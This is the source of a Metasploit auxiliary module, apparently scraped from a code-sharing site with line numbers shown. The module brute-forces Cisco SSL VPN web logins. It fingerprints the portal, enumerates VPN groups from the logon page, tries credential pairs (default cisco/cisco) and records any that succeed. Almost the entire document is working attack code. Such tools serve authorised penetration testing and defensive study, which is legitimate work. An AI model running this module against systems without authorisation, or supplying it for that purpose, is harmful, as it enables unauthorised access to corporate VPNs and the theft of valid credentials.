Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6

7

8
class MetasploitModule < Msf::Auxiliary
9
  include Msf::Exploit::Remote::HttpClient
10
  include Msf::Auxiliary::Report
11
  include Msf::Auxiliary::AuthBrute
12
  include Msf::Auxiliary::Scanner
13

14
  def initialize(info={})
15
    super(update_info(info,
16
      'Name'           => 'Cisco SSL VPN Bruteforce Login Utility',
17
      'Description'    => %{
18
        This module scans for Cisco SSL VPN web login portals and
19
        performs login brute force to identify valid credentials.
20
      },
21
      'Author'         =>
22
        [
23
          'Jonathan Claudius <jclaudius[at]trustwave.com>'
24
        ],
25
      'License'        => MSF_LICENSE,
26
      'DefaultOptions' =>
27
        {
28
          'SSL' => true,
29
          'USERNAME' => 'cisco',
30
          'PASSWORD' => 'cisco'
31
        }
32
    ))
33

34
    register_options(
35
      [
36
        Opt::RPORT(443),
37
        OptString.new('GROUP', [false, "A specific VPN group to use", ''])
38
      ])
39
    register_advanced_options(
40
      [
41
        OptBool.new('EmptyGroup', [true, "Use an empty group with authentication requests", false])
42
      ])
43
  end
44

45
  def run_host(ip)
46
    unless check_conn?
47
      vprint_error("Connection failed, Aborting...")
48
      return false
49
    end
50

51
    unless is_app_ssl_vpn?
52
      vprint_error("Application does not appear to be Cisco SSL VPN. Module will not continue.")
53
      return false
54
    end
55

56
    vprint_good("Application appears to be Cisco SSL VPN. Module will continue.")
57

58
    groups = Set.new
59
    if datastore['EmptyGroup'] == true
60
      groups << ""
61
    elsif datastore['GROUP'].empty?
62
      vprint_status("Attempt to Enumerate VPN Groups...")
63
      groups = enumerate_vpn_groups
64

65
      if groups.empty?
66
        vprint_warning("Unable to enumerate groups")
67
        vprint_warning("Using the default group: DefaultWEBVPNGroup")
68
        groups << "DefaultWEBVPNGroup"
69
      else
70
        vprint_good("Enumerated VPN Groups: #{groups.to_a.join(", ")}")
71
      end
72

73
    else
74
      groups << datastore['GROUP']
75
    end
76

77
    vprint_status("Starting login brute force...")
78
    groups.each do |group|
79
      each_user_pass do |user, pass|
80
        do_login(user, pass, group)
81
      end
82
    end
83
  end
84

85
  # Verify whether the connection is working or not
86
  def check_conn?
87
    begin
88
      res = send_request_cgi('uri' => '/', 'method' => 'GET')
89
      if res
90
        vprint_good("Server is responsive...")
91
        return true
92
      end
93
    rescue ::Rex::ConnectionRefused,
94
           ::Rex::HostUnreachable,
95
           ::Rex::ConnectionTimeout,
96
           ::Rex::ConnectionError,
97
           ::Errno::EPIPE
98
    end
99
    false
100
  end
101

102
  def get_login_resource
103
    send_request_cgi(
104
      'uri' => '/+CSCOE+/logon.html',
105
      'method' => 'GET',
106
      'vars_get' => { 'fcadbadd' => "1" }
107
    )
108
  end
109

110
  def enumerate_vpn_groups
111
    groups = Set.new
112
    group_name_regex = /<select id="group_list"  name="group_list" style="z-index:1(?:; float:left;)?" onchange="updateLogonForm\(this\.value,{(.*)}/
113

114
    res = get_login_resource
115
    if res && match = res.body.match(group_name_regex)
116
      group_string = match[1]
117
      groups = group_string.scan(/'([\w\-0-9]+)'/).flatten.to_set
118
    end
119

120
    groups
121
  end
122

123
  # Verify whether we're working with SSL VPN or not
124
  def is_app_ssl_vpn?
125
    res = get_login_resource
126
    res && res.code == 200 && res.body.match(/webvpnlogin/)
127
  end
128

129
  def do_logout(cookie)
130
    send_request_cgi(
131
      'uri' => '/+webvpn+/webvpn_logout.html',
132
      'method' => 'GET',
133
      'cookie' => cookie
134
    )
135
  end
136

137
  def report_cred(opts)
138
    service_data = {
139
      address: opts[:ip],
140
      port: opts[:port],
141
      service_name: 'Cisco SSL VPN',
142
      protocol: 'tcp',
143
      workspace_id: myworkspace_id
144
    }
145

146
    credential_data = {
147
      origin_type: :service,
148
      module_fullname: fullname,
149
      username: opts[:user],
150
      private_data: opts[:password],
151
      private_type: :password
152
    }.merge(service_data)
153

154
    login_data = {
155
      last_attempted_at: DateTime.now,
156
      core: create_credential(credential_data),
157
      status: Metasploit::Model::Login::Status::SUCCESSFUL,
158
      proof: opts[:proof]
159
    }.merge(service_data)
160

161
    create_credential_login(login_data)
162
  end
163

164
  # Brute-force the login page
165
  def do_login(user, pass, group)
166
    vprint_status("Trying username:#{user.inspect} with password:#{pass.inspect} and group:#{group.inspect}")
167

168
    begin
169
      cookie = "webvpn=; " +
170
               "webvpnc=; " +
171
               "webvpn_portal=; " +
172
               "webvpnSharePoint=; " +
173
               "webvpnlogin=1; " +
174
               "webvpnLang=en;"
175

176
      post_params = {
177
        'tgroup'  => '',
178
        'next'    => '',
179
        'tgcookieset' => '',
180
        'username' => user,
181
        'password' => pass,
182
        'Login'   => 'Logon'
183
      }
184

185
      post_params['group_list'] = group unless group.empty?
186

187
      res = send_request_cgi(
188
              'uri' => '/+webvpn+/index.html',
189
              'method' => 'POST',
190
              'ctype' => 'application/x-www-form-urlencoded',
191
              'cookie' => cookie,
192
              'vars_post' => post_params
193
            )
194

195
      if res &&
196
         res.code == 200 &&
197
         res.body.match(/SSL VPN Service/) &&
198
         res.body.match(/webvpn_logout/i)
199

200
        print_good("SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}:#{group.inspect}")
201

202
        do_logout(res.get_cookies)
203

204
        report_cred(ip: rhost, port: rport, user: user, password: pass, proof: res.body)
205
        report_note(ip: rhost, type: 'cisco.cred.group', data: "User: #{user} / Group: #{group}")
206
        return :next_user
207

208
      else
209
        vprint_error("FAILED LOGIN - #{user.inspect}:#{pass.inspect}:#{group.inspect}")
210
      end
211

212
    rescue ::Rex::ConnectionRefused,
213
           ::Rex::HostUnreachable,
214
           ::Rex::ConnectionTimeout,
215
           ::Rex::ConnectionError,
216
           ::Errno::EPIPE
217
      vprint_error("HTTP Connection Failed, Aborting")
218
      return :abort
219
    end
220
  end
221
end
222

223